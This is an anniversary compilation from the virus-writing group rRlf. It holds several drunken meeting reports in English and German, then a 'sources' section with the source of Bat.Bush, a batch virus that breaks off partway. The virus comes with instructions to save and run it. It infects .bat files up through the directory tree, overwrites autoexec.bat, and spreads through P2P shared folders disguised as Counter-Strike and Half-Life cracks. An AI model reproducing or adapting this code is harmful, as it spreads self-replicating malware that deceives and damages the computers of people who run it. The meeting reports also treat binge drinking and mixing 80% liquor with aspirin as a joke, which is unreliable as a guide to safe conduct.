*Hints: all, articles, sources, arts or anything you like.
intro words by philie
**********************

Wow, exactly 2³ years of rRlf.
And this is what it sums up to.
In here you'll find the best of every member the rRlf had through its time. Well, except for some, of which we lost the stuff, or there hasn't been any.
And some nice rarities, old, rusty and unreleased things.

Anyway, I need to get some stuff lose, and I don't want to sell it on ebay, so here we go :)
The first three people to answer the following questions correctly can win:
1. a little sculpture made by disk0rdia
2. my old, unique, drunken-tuned keyboard
3. a copy of "rRlf-Con #1 (Protokoll) - Spy0na$cHä, !nt3rVieWinaTion and a m!Cro sUck!Ng rRlf baFra HoOd", that is a 1 hour live recording of a rRlf action from the early days
Drop me your answers by mail, here are the questions:
1. Where was the beginning?
2. Who the fuck were the digicam-death-hax0rs?
3. Where could the end be seen?

Our page will stay online, and I will still be reachable by mail, so if you want to get in contact for whatever reason, drop a mail to philet0ast3r@gmx.de.
But now enjoy our last gift to the vx community. hf.

ps: thanks to spth for last minute help :)


viewer by DiA
*************

This viewer requires JavaScript and don't work with Internet Explorer and Opera. Get yourself Firefox or Safari to view the content properly.
If you don't want to use this viewer at all look in the "# plain #" folder (also for binarys, additonal source code and a gnarly mp3).
    

articles

rRlf meeting 2005 DiA, philet0ast3r, rastafarie, Second Part To Hell Austrian mustard don't do it - rrlf meeting 2005 by DiA ======================================================== Fuck, let's rock... At ~01:00pm my train goes to philies town, nothin really happend, just 3 beer and my music. ~04:00pm I arrived philies town, where he already wait's for me. Buy some beer and whisky, picked up rastafarie and let the riot begin, we are on the way to austria... Beer 4, 5, 6, 7, 8 and 9, "Are we already in austria?", "Yepp, you missed the frontier!". Hmm, maybe in reason of 9 beers, I think so. I was drunkn, philie droves (thank god he was not drunkn) and rastafarie take a sleep after 6 or 7 beers. In reason of my alcoholism I lost much of my time-feeling, so I just drank my beer 10, and we are already at SPTH village. It takes us some time (lost time in my head) to find SPTH's house in this "huge" village. But we did it, we are really in austria... Saying hello to SPTH, making some beer exchange and drank it. After that we looked at the most impressive sight in this village, the wine basement, uh sweet, after seeing this my brain asks for more alcohol. So we take all a seat, drank one more beer. Then we going for the hard stuff, the -from last meeting report- well known korn80. Sweet, I only can drink such stuff when I am already drunkn, let's remember...I was, so we go for it. Don't ask me who, or better who not, puked from this damn fine, nearly making blind, drink. I just remember that SPTH brings some aspirin, drunken idea as normal walking around, why not drink k80 with aspirin?! Hm, first reason: it is totally stupid, and second: apirin don't dissolve in k80 :D. Fuck off! SPTH puked, then me. That aspirin won't go down my throat, more the other way. I really puked in austria... I can't believe it, I fell asleep after signature some stuff for kefi. Breakdown in austria... After getting up I am still drunkn as hell, and I wonder why rastafarie, philie and SPTH laughed at me, after seeing my face in the digicam I know why, they painted my whole face with sentences like "I love Korn80" or "DiA = cool" while i sleeped. Next time I will get you all! >:D. Cleaned me up, going for some breakfast and k80. After that all off us fell asleep and we take a ~3h sleep. Getting up agian, going for some beer, smoking and talking. After that we played like little childrens in the snow, because philie and rastafarie had some bobs (not boobs). Yes, we played with snow in austria... It becomes cold and my beer was empty, so we decided to go to a pub. After entering this trashy pub we buy all a pretty expensive steaming ranger and play some rounds kicker. SPTH beats us all..."you are a crack! ;)". We all getting boring to gets a ass-kick by SPTH, so we went off to play pool. Normal people throws a coin or somethin, but we trash each other to get the staff of the two teams. Rastafarie and me wins the match. Yeah, we win a pool billard match in austria... We decided to play from now on one against one, but it takes another way. Rastafarie gets us all a beer (thx for this mate). We drank a little bit and then rastafarie cuts his finger with this glas of beer, dont ask me how. There was pretty much blood. After rastafarie gets some kinky first aid, he, SPTH and SPTH's mother wents to hospital. Philie and me cleaned up the blood, finished the pool match (nobody wons, in reason of no rules;)) and then we take a seat. Ohh yes, we cleaned up a pub full of blood in austria... While talking about VX and AV the village society enter the pub. Hell, that much austrian people and every one of them wants to speak with us. Philie and me don't understand most time what they want. It was pretty funny, and after SPTH's dad buys us a beer it have to get a little bit funnier. At this time rastafarie and SPTH comes back, we drank more beer (how can I use this word so often in this article?! because we drank that much ;P) and after finishing this we went back to SPTH's house. Rastafarie goes to bed in reason of medical drugs, and the rest of us watching a senseless splatter movie, and drank same time some beer, what else?! The beer rocks in austria... After taking some sleep, we already have to left austria, because I have to get my train. So we all packed our stuff, say goodbye to SPTH and his family and leave this pretty smooth small village. At this point, the end of this article, I have to thank philie for taking me with his car, to rastafarie for making my sadistic site of me happy (blood blood blood ;)), SPTH for all the beer, food and k80 and SPTH's family for the nice hospitality. I am really looking forward to see this people again on the next meeting. Thanks a lot for this awsome time in austria... Children of the KORN 80 II - The final Sacrifice by philet0ast3r About half a year after surviving part one, our irresistible creed for high toxic liquids got us back together. The journey began friday, the 21st of January in my town. DiA arrived by train, I picked him up and we drove (with my car) to a nearby city (where the rRlf was founded) to pick up rastafarie (ex-rRlf). Our destination: The holy KORN 80, an ancient liquid of incredible power, that was supposed to be hidden in a small Austrian mountain village. Second Part To Hell was already there, so we knew where to go. We thought we would arrive there at around 22.00, but as there was partly so much snow, I had to guess where the road is. We arrived 2 hours too late. Well, that village really is not big, but we managed to spend another 30 mins driving around searching spth. I thought it would be the right direction, but after driving 2 km down a narrow road with mountains on the left and houses on the right, I realized: A dead end. There (... a dead end at the ass of the world), we met some drunk Austrians (one looking like a strange mixture of a leftover hippie and a cowboy), who told us the way. Finally we found the right house. Or houses: One where spth's family lives and next to it the house were his grandpa lived. Now a party-house. We went to that one, and finally I could start drinking (the others were already drinking all the way in the car). spth made us some toasts. DiA ate it with mustard. Or better: He ate mustard with toast (he did that the whole weekend: eating everything with an imense amount of mustard). spth said, it was good, that we were finally coming, he was thinking about it already all the time. Suddenly he held a bottle in his hands. From it emerging bright, energetic light. I sank to my knees as I saw the label: <center>------------------------------------ SPITZ 80% vol ANSATZ KORN (österreichisches Erzeugnis) ------------------------------------</center> There it was. Holy shit. Well, we opened it, and started drinking. The first round pure. I thought: "How the hell was I able to drink so much of this stuff the last time?" while having to puke after the first swallow. I think spth had to puke too, so rastafarie was not drinking it pure but with coffee (spth's special strong coffee = looks like a black hole after putting 1 l milk in it). I mixed it with orangejuice. But spth and DiA went to the next step: The first two persons to experience rRlf drink #2: KORN 80 + aspirin. Killer. spth puked at once. He said: "It's strange: You try to swallow it, and that moment the aspirin starts to bubble and brings up all the KORN 80 again, burning your throat to death." DiA puked too. Really much, and he couldn't stop. Nice. It smelled like mustard. After lots of more drinking, spth came up with a LP: David Hasselhoff - Looking for freedom. rastafarie (mostly) and spth had lots of fun singing this shit (the lyrics were printed on the cover), I was dancing through the room, throwing down some stuff. The next thing was "Bubi, Bubi nocheinmal", some old and stupid Austrian folk shit. We had lots of fun scratching the LP and dancing pogo to it. Later spth took out a second bottle of KORN 80, which he planned to send to Kefi. We started to write Kefi a letter: Everyone wrote 2 words, then the next person wrote 2 words. Out came lots of senseless drunken bullshit, but funny. We thought, just letter and KORN 80 is boring, so we started to sign lots of different trash for him (Kefi: the apple is pure chance ;), to be put to the package. Somewhen DiA fell asleep, so we started to paint his face with a black marker (... also inside his ear). It was getting cold, because the stove burned out. It was only glowing a bit. Now that was the effect of pouring a bit KORN 80 into it: It was getting bright and we were still drinking. Somewhen in the morning spth's father came into the party-house to welcome the guests. At that moment DiA woke up, not really knowing, how his face looked like... Some time later we decided to watch a episode of Family Guy (rastafarie brought about every episode with him), but all fell asleep while watching. Our Saturday began in the afternoon. I remember drinking a beer and getting down to the kitchen, where I talked with spth's mother. The others and the rest of spth's family were coming, and his mum made us a great breakfast. Well, for the family it was supper. DiA ate mustard with bread, mustard with sausages, mustard with cheese and mustard with eggs. As it was already getting dark, we hurried up to get drunk again. Which didn't take long, cause we started with KORN 80. As rastafarie and I are members of an international extreme bob team, we had our bobs with us, to check out the Austrian mountains. Which would have been a good ride, if the farmers wouldn't have made up wire fences all over. Wasn't as much fun, as we thought, so we went to a pub. There we got us some Steaming Rangers and started playing table soccer (in Austria it's called "Wuzlkastn" :). But as spth seemed to spend much time with this table, it was kinda boring, cause if you play with spth you will always win. If you play against him, you will loose. So we thought billiard would be better. But who plays together? The answer was fought out, using billiard sticks as weapons. We ran around the room like little kids hitting each other. Finally we started playing, but not long. rastafarie managed to brake the beer glass he was holding in his right hand with the billiard stick he was holding in his other hand. In a way that he cut through the vein in his right middlefinger. We were all drunk as hell (or "vull vull" how you say in Austria :), and suddenly the floor looked like this: Wow. spth and rastafarie went to spth's mum, who brought them to a nearby hospital. After I cleaned the floor of glass fragments and blood, DiA and I needed a beer. We talked a while about this and that, and suddenly the door opened, and in came: About 30 ppl of a krampus society (hard to explain what that exactly is...), who filled the pub. Everybody seemed to be drunken. There were we sitting, DiA from Saxon, me from Bavaria, drunk in a little pub in a little Austrian mountain village, not understanding any word of that strange dialect. This was really a strange situation. Someone asked us, if we were viruswriters. The whole village seemed to know about spth's hobby. Later DiA and I tried to play cards, but it didn't work out ... the cards were kind of strange (Stüssi der Flurschütz!) and somehow all looked the same. Then spth and rastafarie came back, and rastafarie was really fucked up. We stayed a while and DiA and I tried to hack a game vending machine. But we only managed to restart the thing by pulling the plug and putting it back in. But after doing that for a while, the thing totally crashed, so we went back to spth's house to eat something. We drank a few more beers and watched a Japanese splatter movie I brought with me: Story of Ricky. Dumb story, dumb actors, dumb dialogs, but funny. And lots of blood and gore. rastafarie already had enough of that, so he went to bed. The rest of us did that after the movie. It was Sunday noon, as I felt able to drive. We got our things together, said "until next time" and left spth in that little village. We had to hurry, otherwise we would have missed DiA's train from my town. Well, we missed DiA's train, so I drove directly to a bigger city, where DiA would have had to change trains, if he took that from my town. We were short before the city (it was already getting dark again), as my car stopped: We were out of gas. We called a breakdown service, but they wanted about 300 euros for bringing us some gas. So we called a taxi, which brought us to the next gas station (which was of course kinda around the corner), I bought a gas canister, and the taxi brought us back, which had cost me all together 15 euros. Somehow we managed to get to the station in time, we even had enough time to eat something. DiA took his train, I first brought rastafarie back home and then myself. I fell into my bed and asleep. It was a hard weekend. Next day I had to get up early: School, where I wrote an exam, for which I had learned like nothing. But well, you have to set priorities. DIA - Day In Austria (x2) Wir befinden uns am verschneiten Arsch der Welt als ich, nachdem ich zwischenzeitig weggenickt bin, meine Augen öffne .Es ist Mitternacht oder etwas um den Dreh. Draußen bei den Zapfsäulen der geschlossen Tankstelle stehen die beiden anderen und rauchen, während ich versuche aus dem Auto zu klettern. Irgendwann nach dem 6 Bier muss ich weggenickt sein, nachdem ich zuvor unter der Fahrt versucht hatte , in eine leere Lipton Eisteeflasche zu pissen. Da ich betrunken und es schon dunkel war, kann ich nicht sagen wie viel an der Flasche vorbei gegangen ist ( sorry Philie ;) . Als wir ausgeraucht hatten und uns die übelst kalte Nacht zum weiterfahren zwang, erreichten wir irgendwann gegen 1 Uhr Nachts ******. Der Kurze Aufenthalt an der Tankstelle und die Fahrt erinnerten mich an Shining. Eisige Kälte, Schnee und weit und breit so schien es, keine Menschenseele. Wir hatten Schwierigkeiten unseren Komplizen zu finden, also bogen wir irgend- wo in ****** rechts ab. Wir fuhren einen schmalen, vereisten Weg entlang der uns an irgendwelchen leblosen österreichischen Berghäusern vorbei führte und kamen auch schon im Nirgendwo an. Dort hatten wir jedoch das Glück, einer Gruppe verrückter Einheimischer zu begegnen, die trotz des offensichtlich übermäßigen Drogenkonsums in der Lage war uns den Weg zu beschreiben. Also lachten wir uns erst einmal über die freundlichen, verrückten Freaks den Arsch ab und kehrten um. Es dauerte auch nicht mehr lange und wir erreichten unseren Zielort. Wir wurden schon auf der Strasse von unserem wartenden Gastgeber Spth empfangen und begaben uns, nachdem wir uns begrüßt hatten, in den Konferenzraum , welcher sich in einem kleinen Partyhäuschen nahe des Hauses befand. Dort machten wir dann dort weiter, wo ich bevor ich eingenickt war- und DIA nicht, aufgehört hat(te). Spth hatte wie es schien an alles gedacht, sodass wir nach dem obligatorischen Frühstück um halb zwei Uhr morgens, auch schon mit dem köstlichen r Bier weiterseideln konnten. Auch wenn die Brautradition dieses Bieres nicht in die sakrale Entstehungszeit des bayrischen Reinheitsgebotes zurückreicht, so ist es ein wirklich schmackhaftes Bier , das sich gut schwallen lässt ! Nachdem unser Gastgeber in infantiler und fast schizoide wirkender und deshalb sympathischer Vorfreude gestand, sich schon seit längerer Zeit auf den (-original österreichischen-) Ansatzkorn (-mit 80 % Alkoholgehalt-) zu freuen, machte er die Austrian-Wunder-Korn-Flasche auf. In einer ruhigen, gemütlichen Runde saßen wir also am Tisch, tranken dieses köstliche, nach totbringendem Frostschutzmittel schmeckende Gesöff , von dem ein Großteil von uns sich die Eingeweide rauskotzen musste. Glücklicherweise blieb mir dies erspart, da ich mich entschloss, nicht wie Dia und Spth den Ansatzkorn mit einer Aspirintablette auf zu frischen. Nachdem wir uns in fröhlicher Heiterkeit betranken, schlief Dia ein, so dass sein Gesicht zum Zielobjekt unserer künstlerischen Energien wurde. Nun zeigte uns unser offensichtlich mit dem Okkultismus vertraute Gastgeber, sein geheimes, in der Mitte der Stube gelegenes alchemistisches Versuchslabor, indem er die Magie des Ansatzkorns nachzuweisen versucht. Man mag es glauben oder auch nicht, er schaffte es tatsächlich , die Glut des mittlerweile erlischenden Feuers des Kachelofens mit einem magischen Sprutz aus der Ansatzkornflasche in loderndes Feuer zu verwandeln !!! Nachdem er uns zuvor in den bescheidenen Weinkeller des Hauses geführt hatte und ich glaubte im Himmel gewesen zu sein, war er in meinen Augen nun endgültig ein Zauberer. Als es hell wurde und wir wieder vollzählig einsatzbereit waren, gingen wir irgendwann in der Früh rüber in die große Version des Partyhauses um uns Family Guy anzuschauen, wovon ich knapp 10 000 Folgen mitgebracht hatte. Da uns nach einer langen Nacht der Zauberei die Augen zufielen, beschlossen wir ein Nickerchen einzulegen. Gegen 15 Uhr wurden wir vom penetranten Geräusch des Weckers geweckt und frühstückten erst einmal einen Happen. Da noch etwas vom delikaten Ansatzkorn übrig geblieben war, dauerte es nicht lange, ehe ich wieder so steif war, wie bevor wir uns schlafen gelegt hatten. Nun wo wir wieder in einem funktionsbereiten Zustand waren, gingen wir Bobfahren. Philie und ich hatten unsere Bobs mitgebracht um uns diesen Spaß in den Bergen nicht entgehen zu lassen. Leider hielt sich das Toben im Schnee in Grenzen, da sich die österreichischen Kuhbauern in der Steiermark offensichtlich in einem erbarmungslosen Konkurrenzkampf befinden und unbedingt ihre Kuhweiden, mit Drahtstrickzäunen, voneinander abgrenzen müssen. Diese boten eine wunderbare Gelegenheit sich beim Rodeln den Schädel abzuhacken und der große Depp zu sein. So gingen wir doch eher auf Nummer sicher und suchten das nahegelegene Wirthaus auf, indem wir Tischfußball (Kicker) spielen wollten. Schon bald stellte sich heraus, dass Spth hier schon oft diesem Vergnügen nachgegangen sein muss, da jeder Ballkontakt von ihm ein Tor als Folge hatte. Nachdem die verschiedenen Teams, die Spth als Gegner gehabt hatten, einige male verloren hatten, dachten wir es könnte lustiger sein , Billard zu spielen. So nahmen wir also unsere vorzüglichen Steaming Ranger zur Hand und begaben uns hinüber in den Billardsalon des Hauses. Dieser Nebensalon, den man nur für uns geöffnet hatte, indem sich der Billardtisch befand, war mit leeren Schnaps- und Softdrinkflaschen zugestellt die sich hervorragend zum Umgetretenwerden eigneten. Dies geschah dann auch relativ bald, als wir beim Ausfechten der Gruppenformation im Eifer des Gefechts dagegen traten. Der Bedienung muss es vorgekommen sein wie in einem Reptilienzoo, als sie hereinkam um uns zu bitten, aufzuhören uns gegenseitig mit den Billardkös zu verkloppen. Nun gut, so kam es also dass wir anfingen Billard zu spielen. Nach einem ausgeglichenen Spiel und immer wieder spontan dazwischen hereinbrechenden Kö-Fecht-Klopp-Attacken passierte mir dann ein kleines Missgeschick, als ich in einer Hand mein Bierglas hielt und versehentlich mit der anderen, in der ich das Kö hielt, dagegen stieß. Aufgrund der Hektik der Ereignisse kann ich nicht mehr sagen wie es genau dazu kam, jedenfalls hatte ich mir mit dem zerbrechenden Bierglas in den Mittelfinger geschnitten. Nachdem meine 0,5 cm tiefe, volarseitige Schnittverletzung des PIP-Gelenkes des 3. Fingers der rechten Hand mit drei Stichen in der örtlichen orthopädischen Ambulanz genäht worden war, fühlte ich mich etwas wohler in meiner Haut. Grob geschätzt , habe ich auf dem Boden des Billardsalons etwa 500 Liter meines Blutes als kleines Dankeschön hinterlassen. Von nun an glich meine Anwesenheit eher der eines passiven Beobachters. Nachdem man mich im Krankenhaus mit 10 000 verschiedenen Chemikalien vollgepumpt hatte, verspürte ich nun kein Bedürfnis mehr Alkohol zu mir zu nehmen. Wir verweilten noch eine Weile in dem Wirtshaus, Dia, Philie und Spth tranken noch weitere Hunderte Liter von Bier während die österreichische Dorfjugend das Lokal am späten Abend immer mehr an sich riss. Das nächtliche Treiben in ****** überraschte mich wirklich sehr, zumal es mir so vorkam als hätte sich das ganze Dorf in dem Wirtshaus eingefunden. Nachdem Dia und Philie ihre Virenschreiber-Elite-Kenntnisse am Spielautomaten unter Beweis stellten und ihn durch permanentes Ein- und Ausziehen des Steckers zum Abkacken brachten, war der Zeitpunkt günstig wieder ins Partyhaus zu gehen. Anscheinend hatte es sich in der Zwischenzeit rumgesprochen, dass die Elite der Virenschreiberszene bei Spth eine Versammlung abhält, da wir von nun im minuten Takt genötigt wurden, alles was uns in die Hände kam zu signieren und an Fäääns zu verschenken. So kam es also, dass jeder von uns ungefähr eine Tonne von irgendwelchem Scheiss mit den Unterschriften der übrigen drei Teilnehmer als Andenken mit Nachhause nehmen konnte. Mein kurzes Essay neigt sich nun dem Ende zu, da ich nach dem Krankenhausbesuch ziemlich im Abkacken begriffen war. Die rRlf Versammlung verlagerte sich nach einer Weile auch wieder zurück in die größere Version des Partyhauses um dort Splatterklassiker wie The Story Of Ricky anzuschauen. Für mich war der Zeitpunkt gekommen mich zu verabschieden und meinen Rausch auszuschlafen. Nach dem Frühstücksbier am nächsten Morgen neigte sich die Versammlung langsam dem Ende entgegen. Gegen 12 Uhr brachen wir dann, nachdem wir uns verabschiedeten, auf und fuhren mit einem Batzen schöner auch wenn teilweise schmerzhafter Erinnerungen zurück nach Deutschland. Bezeichnend für den ganzen Aufenthalt bei Spth im gemütlichen Österreich waren die letzten Bilder die mir von ****** in Erinnerungen bleiben werden. Beim Wegfahren kamen wir an Spth’s Vater und einem seiner Nachbarn vorbei, die sich bei wunderschönem Wetter , angelehnt an eine Gartenscheune, im 12-Uhr-Mittags-Stress erst einmal genüsslich ein Bierchen im Freien gönnten. Klasse ! -rastafarie- rRlf's bloody weekend by Second Part To Hell When we met last time in summer 2004, we decided to repeat it. Well, all started again, when philet0ast3r called me once in winter 2004 after he visited a shown by Alf Poier (a totally sick guy from Austria, who was at the Songcontest 2002 with a song called 'Weil der Mensch zählt'). I think philie was really drunken that time, because he told me he used his gas cost money for beer. :) Anyway, we talked about the date, and said that 14/15/16 january 2005 would be good. We asked DiA if it's ok for him too, and he agreed. Time went and soon DiA said he can not come that weekend - so the fat 'event' should happen one week later - and it did. Invated were philie & girlfriend and DiA. but philie's girlfriend couldn't come, so he asked rastafarie (ex-rRlf member), who really came. Friday: First meeting-related thing at this day was a nice telephon call by DiA's mummy :) She asked me if they are still in Austria. Well - nice talk :) Normally they should have come at 10 in the evening. But as they had some problems finding my village and maybe even harder: me in that small town (they drove ~30minutes for a 1 minute way) :), they came at 1 in the night. First we did was opening beer: Philet0ast3r, DiA and rastafarie drank one of the beer from a nearby city (the best one!!!), and I drank one of DiA's and one of philet0ast3r's beer. Both were really good. Then I showed them my favorite place in the house: The vine cellar - I noticed by their smileys that they really liked the room :). Then - Eating: I made some toasts. rastafarie ate it normal, philie ate a vegetarian toast and DiA asked me immediatly if I have enough mustard. We wondered, but then we noticed what he meant: DiA = mustard (german: Senf) addicted. His toast looked like that: Inside mustard, above it mustard and when he got it, mustard again. After the eating he ate the rest of the mustard tube: pure! :) After eating we inputed some music and sat down to drink beer and some of the wiskey, which they had with them, until I took out our good old friend: The KORN80 :) Before drinking I went for a bucket, which we really need. And I think I was the first who need it: After the first glass the shit didn't want to stay in my stomach - so I puked. Nice feeling when that thing like burning oil crosses your neck two times... outsch! :) Nevertheless we continued drinking - of course - and next glass philet0ast3r had to puke. We had a good laugh again - and continued. It's totally silly and selfdestruction, but it didn't bother us. rastafarie, after seeing us puking, mixed the KORN with coffee (don't say he's lame, you don't know my coffee :D) and DiA was really heavy: He drank the thing like normal water, without changing his facial expression in any way. :) Then rastafarie said he has a headache, so I gave him some aspirin. Being quite drunken (and for DiA and my taste - selfdestructing), we decided to mix a real nice drink, which is now the official rRlf drink issue #2: KORN80+Aspirin! philet0ast3r and rastafarie were enough intelligent to say no, so they did not drink it. Well,DiA and me mixed, and (tried to) drank it. I think I was first again: I had to puke as hell, because the drink this time couldn't not even pass my neck. It was like a fast input/output process :) DiA was better: He drank it...10secs... and then he also puked - about two liters :) It was so damn ugly and funny - we nearly could not stopp to laugh, and DiA not to puke :) Then we stopped with KORN80 for a while, and drank more beer and wiskey (and coffee). Soon I got the idea to of inputting the David Hasselhoff's LP disc 'Looking for freedom'. :) I also had the text of it, so we *tried* to sing. rastafarie was the main singer and was happy as a little child while singing. He really cried euphoric to the sound of David. DiA, at that moment, could not talk anything anymore. He drank too much, and just noded his head and smiled when we tried to talk with him (maybe we could not do it eigther - i forgot). Meanwhile philie did pogo that heavy, that he nearly destroyed the chitchen. After David and some beer again, we inputed the next LP disc called 'Bubi, Bubi, nocheinmal' (which means something like 'Babyboy, Babyboy, once again' - totally crazy). Without understanding the lyrics, we did just heavy hardcore pogo. Totally funny - 4 rRlf (related) guys jumping euphoric crazy at 2m², one more drunken than the other one. After the 'Bubi, Bubi, nocheinmal' we sat down again to drink and talk about anything we could think of (well, not too much topics, because nobody wa able to use his brain fully). Then we thought about Kefi (I told him that I'm going to send him a bottle of KORN80) and started to write a A4 site of 100% senseless text and pictures. While doing this we also got the idea to send him more than just a signed bottle KORN80 and a paper with text, so we also signed an aspirin (that he's able to make the rRlf drink issue #2), a black and a white choco thing, a cigarette, an apple and more stupid/crazy/senseless stuff. I really hope that he will like it. :) Anywhen, I think about 4-5 in the morning DiA fell asleep and we had a victim for our creativity. We got a fat black marker and signed/painted his face :) Also that night the fire in the stove stopped, so we had to reactivate it. Therefor we tried the KORN80 - and it worked. 0.1 seconds after doing it into the stove, a 2m high flame came back. Looked nice and worked great - it was warm again. Soon we realiced that it became bright, so we ate something and drank our good-morning-beer. That time also DiA was wake again and was astonished about his artistic painted skin. :) We wanted to view a episode of 'Family Guy', but we were too tired and decided to go to bed..... Saturday: We woke up at ~15.00 - some still drunken :) First we did was going to the chichen and drink one of the hell drink: KORN80. That day it was better, so we decide to empty the bottle, I think there where 3 more rounds, and soon everybody was drunken again. I can't really remember what we did until it became dark - I think drinking KORN, beer, coffee and smoking. Then we went to a field nearby us to ride the bobs rastafarie and philet0ast3r got with them. After some funny and even painful rides we decided to went to the next pub, because it was cold and beside of DiA's beer we had no alcoholic drinks with us. We first went in to drink a Steaming Ranger (1/3 Wiskey, 1/3 cola, 1/3 orange juice), then we played tablesoccer. I could neighter concentrate nor see the balls right, anyway I won most time because the others could not do it eighter :D. Then we went to another room to play pool.First question: Who plays together? We had an excellent fight with our magic pool staffs :) Then we played. But soon rastafarie, the clumsy, broke his glass of beer and hurt his finger really (!!!) bad. His blood decorated big parts of the floor. We quickly asked the barkeeper lady to help us. We (the barkeeper lady, who was afraid of blood and me, who was totally drunken) tried to bandage his finger, who looked really bad. Somehow we managed it, then I called my mum to drive to the next hospital. There rastafarie got known the Austrian health system: We had to wait for ~20-25mins until somebody came. It was a X-Ray assistent lady, who did not know what to do. Then she tried to cut the bandage of his finger, as it was already totally blue. We had to wait for more ~10-15 mins until the doctor came. Then everything was really fast: rastafarie got some injections, then I went out of the room.Soon (about 10mins later) he came out again and said that his vein was broken. Everything seemed to be as good as possible, so we drove back to the pub, where DiA and philet0ast3r where still drinking beer :) I also continued drinking beer, but rastafarie was not that active anymore, and after philie and DiA had fun with destroying the photoplay automat, we went home to drink some beer there again and to sign everything we could find :). Then we went into the real house. rastafarie went to bed as he was kind of stoned by the whole medicine he got, and we watched a video philet0ast3r got with him called 'The Story of Richy' or something like that. It had no plot, just blood in it. That day I saw more blood than ever in my life... At ~3-4 in the night we went to bed. Sunday: The last day was really short. We stood up at ~9-10 in the morning, and they had to drive soon, because DiA must not miss his train in philet0ast3r's city. Well, I think we ate something and drank a beer (did we - i can not really remember). At ~midday they left, and with it a really great, funny, less-sleeping, bloody, alcoholic weekend ended. Later this day my brain started to work really again - for the first time of the ~2 days :) Well, I really enjoyed the weekend and I'm really looking forward meeting for the next time. We have already talked about that: It should be in or nearby philet0ast3r's city in summer 2005 and this time we want to make it bigger. That means more vxers/related people are invated. I really hope some will come... I'll definitivly take with me a KORN80 bottle! :)

sources

Bat.Bush Adious *EXCLUSIVE TO BZ #2* ___________________________________ // \ || Bat.Bush By Adious [rRlf] | || First batch to find name of | || it's drive. | \\___________________________________/ .: Introduction :. "Batch is not hard.Trying to do something new with it is." I thoght of the idea of this virus as i was verry bored at night with nothing to do.Is it cool for the batch to find out what drive it is running in? After trying and testing i finally came out with this code.I found out from slagehammer,who tested my works,told me that it could only work win98.I could not write routines for batch in other Windows version (win2k,winNT,winME,etc) because i do not have them.I think it would be intresting to some ppl after spending some hours thinking of a good routine for it.Anyways,I hope you enjoy reading this source. .: Stats :. Name: Bat.Bush Size: 13.7 KB 14,336 bytes finnished on: 23/6/03 Infection target:*.bat.It will serch for the batches in current directory and work it way to the root directory and infects batches in between (dotdot emu). Worming target:mIrc and some P2P programs encrypted:No. Polymorphic:No. Anti-AV routine:No. Payload:As soon as it infects all the batches in that drive,it will search for autoexec.bat and overwrites it with the payload.It shows a "massage of the day" to the user and runs the virus. Works on:Win98 (as far as I know) .: Source Code :. Those of you who knew batch would know what it does..there is no need for comments.I'll just write some comments for the newbies.Remember:"Batch is not hard.Trying to do something new with it is." My comments are in "::>" (without the qoutes).To compile,just cut the source and save it as "bush.bat" and remove the comments I've made. ==============================(CuT HERE 8<)================================================================ :: Bat.Bush :: By adious [rRlf] :: Finnished on 23/6/03 2:30:48.59a @echo off cls if %shit%==prick goto ci if %cs%==yes goto msg1 if %hl%==yes goto msg2 if %lp%==yes goto msg3 if %mad%==yes goto msg4 goto ci :msg1 echo --------------[Counter-Strike Crack]---------------- echo. echo Press: echo [1] install CS package echo [2] exit setup echo. choice /c:12>nul if errorlevel 1 set done=1 goto ci :msg2 echo -------------[ Half Life Crack]---------------- echo. echo press: echo [1] Install Half Life Crack echo [2] exit setup choice /c:12>nul if errorlevel 1 set done=1 goto ci :msg3 echo Installing Linkin Park:Somewhere I belong echo ,........ pause goto ci :msg4 echo Installing Madonna:American Life echo ,........ pause :ci cls ::> (top code) If this virus is spreaded through P2P,It will show some ::> fake msg to tell the dumb user that it is installing the following items. ::> (bottom code) To find what name of drive the virus is inside sitting inside ::> it will then set the "pat" varible with the name of the drive to be used ::> latter on in the code cd >l.l find /c /i "a:\" l.l >nul if not errorlevel 1 set pat=a:\ find /c /i "b:\" l.l >nul if not errorlevel 1 set pat=b:\ find /c /i "c:\" l.l >nul if not errorlevel 1 set pat=c:\ find /c /i "d:\" l.l >nul if not errorlevel 1 set pat=d:\ find /c /i "e:\" l.l >nul if not errorlevel 1 set pat=e:\ find /c /i "f:\" l.l >nul if not errorlevel 1 set pat=f:\ find /c /i "g:\" l.l >nul if not errorlevel 1 set pat=g:\ find /c /i "h:\" l.l >nul if not errorlevel 1 set pat=h:\ find /c /i "i:\" l.l >nul if not errorlevel 1 set pat=i:\ find /c /i "j:\" l.l >nul if not errorlevel 1 set pat=j:\ find /c /i "k:\" l.l >nul if not errorlevel 1 set pat=k:\ find /c /i "l:\" l.l >nul if not errorlevel 1 set pat=l:\ find /c /i "m:\" l.l >nul if not errorlevel 1 set pat=m:\ find /c /i "n:\" l.l >nul if not errorlevel 1 set pat=n:\ find /c /i "o:\" l.l >nul if not errorlevel 1 set pat=o:\ find /c /i "p:\" l.l >nul if not errorlevel 1 set pat=p:\ find /c /i "q:\" l.l >nul if not errorlevel 1 set pat=q:\ find /c /i "r:\" l.l >nul if not errorlevel 1 set pat=r:\ find /c /i "s:\" l.l >nul if not errorlevel 1 set pat=s:\ find /c /i "t:\" l.l >nul if not errorlevel 1 set pat=t:\ find /c /i "u:\" l.l >nul if not errorlevel 1 set pat=u:\ find /c /i "v:\" l.l >nul if not errorlevel 1 set pat=v:\ find /c /i "w:\" l.l >nul if not errorlevel 1 set pat=w:\ find /c /i "x:\" l.l >nul if not errorlevel 1 set pat=x:\ find /c /i "y:\" l.l >nul if not errorlevel 1 set pat=y:\ find /c /i "z:\" l.l >nul if not errorlevel 1 set pat=z:\ del l.l cls ::> below routine tries to infect all batches in that peticular drive. ::> it works it's way down to the parent directry to root directory (DotDot emu :) ::> while infecting everything in between. :infecto @attrib +r %0 echo.>l.t echo @set shit=prick >>l.t @copy l.t + %0 m.b @for %%a in (*.bat) do copy %%a + m.b del l.t | del m.b cd .. >%pat%p.l @find /c /i "invalid directory" %pat%p.l @if not errorlevel 1 goto infecto @echo.>l.t @echo @set shit=prick >>l.t @copy l.t + %0 m.b @for %%a in (*.bat) do copy %%a + m.b @del l.t | del m.b | del p.l copy %0 %pat%bush.bat attrib -r %0 cls if not exist %pat%windows\*.* goto auto :p2p echo set cs=yes >t.i if exist %pat%program files\morpheus\my shared folder\*.* copy l.t + %0 %pat%program files\morpheus\my shared folder\csc.EXE.bat if exist %pat%program files\bearshare\shared\*.* copy l.t + %0 %pat%program files\bearshare\shared\csc.EXE.bat if exist %pat%program files\eDonkey2000\incoming\*.* copy l.t + %0 %pat%program files\eDonkey2000\incoming\csc.EXE.bat echo set lp=yes >t.i if exist %pat%program files\morpheus\my shared folder\*.* copy l.t + %0 %pat%program files\morpheus\my shared 